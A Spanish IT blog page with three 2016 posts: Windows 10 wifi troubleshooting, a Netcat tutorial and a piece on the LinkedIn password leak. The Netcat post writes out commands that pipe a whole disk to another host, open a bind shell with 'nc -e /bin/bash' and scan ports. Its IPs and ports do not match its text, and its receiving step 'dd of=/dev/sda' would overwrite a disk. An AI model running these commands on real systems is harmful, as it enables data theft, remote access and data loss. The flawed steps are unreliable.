jueves, 16 de junio de 2016

Windows 10: "Mi wifi no conecta".








Muchas veces llegan a nosotros clientes en entornos Windows con la misma pregunta, mi Wifi ya no se conecta, mi portátil ya conecta al Wifi o mi ordenador ya no se conecta al Wifi. Pues bien hoy vamos a ver que posibles soluciones restablecer la conexión y el correcto funcionamiento. Ya que vamos a ver el problema en el portátil, lo primero es descartar un problema en el router y esto es muy sencillo tan solo comprobando que alguien más esta trabajando con normalidad con este mismo router ( un compañero de piso, otro dispositivo como puede ser un móvil o similiar). Una vez comprobado que el problema es en nuestro sistema, comenzaremos a dar los pasos para arreglarlo.


  • Comprobamos que nuestra dispositivo Wifi no esta desconectado: Tenemos que comprobar que no este ni desactivado ni en modo avión.


 


  • Solucionador de problemas: Hacemos uso del solucionador de problemas de Windows a ver si nos puede sacar del apuro.
  • Actualizar Windows mediante Windows Update: Es importante tener Windows siempre actualizado para el correcto funcionamiento de todos sus componentes.
  • Actualizar los drivers de nuestro hardware wireless: es importante tener actualizado el driver (programa que interactúa con el hardware). Esto lo puede hacer Windows automáticamente o podemos descargarlo desde la página del fabricante mediante el administrador de dispositivos. 




  • Si continuamos sin conectar borramos la configuración de la red wifi: Para borrar la red wifi tenemos que ir a inicio > configuración > internet y red > Wifi > vamos hasta abajo y pinchamos en administrar configuración wifi > una vez aquí ya podemos borrar la configuración wifi.




  • Configurar la red Wifi a la que nos conectemos manualmente: Otra opción es establecer manualmente la conexión.
  • Deshabilitar Ipv6: En algunas ocasiones puede que Ipv6 nos de algún conflicto pero esto se nos ha dado en muy pocas ocasiones.


  • Malware: Si todo lo anterior no ha funcionado es posible que tengamos un problema con algún tipo de malware.
  • Problema hardware: Si todo lo anterior no ha funcionado es posible que tengamos un problema con el hardware.



viernes, 10 de junio de 2016

Ncat: Escaneando puertos, abriendo shells remotas & volcando discos remotos.








Seguimos con Netcat, esta vez vamos a ver tres puntos concretos como menciona el título de la entrada. En primer lugar veremos como podemos realizar un volcado de disco remoto, esto es aplicable a carpetas más concretas y demás. Cuando estamos dentro de un sistema remoto o simplemente queremos mandar un volcado del sistema nos basta con dejar una orden pendiente con Netcat y ejecutar en el ordenador que querámos la orden Netcat para recibir dicho volcado por ejemplo.

En primero lugar ejecutamos la orden en el sistema que queremos extraer la información en este caso un sistema con ip "192.168.1.12" y aclaramos esa orden al puerto "8080". Sería como la siguiente orden.

dd if=/dev/sda | nc 192.168.0.1 9000
Una vez tenemos hecho esto ejecutamos la siguiente orden en el sistema que queramos volcar la información como muestra la siguiente orden.

nc -l -p 9000 | dd of=/dev/sda

Ahora tenemos el volcado de información en nuestro sistema. Netcat también nos ofrece la posibilidad de ejecutar shells remotas, es decir ejecutar una shell de otro sistema desde el nuestro con todo lo que ello conlleva. Lo que haremos es dejar en el sistema remoto un shell a la escucha mediante la orden "nc -l -p 8080 -e /bin/bash" y en el sistema donde queramos usar esa shell remota " nc direcionipremota 8080".



Por último veremos como escanear puertos mediante la orden "nc -v -w 1 localhost -z 1-3000". Donde escanearemos nuestro propio sistema en busca de puertos abiertos en este caso del 1-3000. En nuestro caso vemos que descubre un puerto abierto el 22.






martes, 7 de junio de 2016

LinkendIn, filtrado de contraseñas: Se siguen cometiendo los mismos errores.








Hemos visto en estos últimos años muchos ataques a la red social de trabajo como es LinkendIn en los cuales se han conseguido las contraseñas de los usuarios desde el 2012 hasta hoy en día. En el último ataque de este año 2016, LinkedIn fue vulnerada y se consiguieron 100 millones de usuarios & contraseñas de esta red social. Hoy os mostramos las contraseñas más usadas, para que nos demos cuenta que aún seguimos cometiendo los mismos errores.





Después de echarle un vistazo nos damos cuenta que aún los usuarios siguen utilizando las mismas contraseñas vulnerables, fáciles de usar y que con un simple ataque de fuerza bruta podríamos deducir (en muchos casos con probar 123456). Kaspersky por ejemplo nos da la posibilidad de ver en cuanto tiempo nuestra contraseña caería en manos de un amigo de lo ajeno mediante su web de comprobación de contraeñas seguras.

Volviendo a los ataques sufridos a Linkedin, es importante estar al tanto de estos ataques para cambiar inmediatamente las contraseñas vulneradas y no solo eso, las demás que puedan coincidir de otros lugares/web/redes sociales también porque también habrán sido vulneradas. Se debe de hacer todo esto porque se conoce que están siendo vulneradas cuentas de otros lugares haciendo los datos obtenidos de ataques como estos. También decir la a la cantidad de información que han podido acceder de toda tu vida laboral en definitiva se ha obtenido muchísima información de los usuarios mas allá de los usuarios/contraseñas que podría ser utilizada para ataques dirigidos.

Por último os dejamos un consejo para nuestras contraseñas, ¡tomemos medidas!. Haciendo uso de una serie de medidas como muestra la imagen extraída de la oficina de seguridad del internauta podemos protegernos mejor.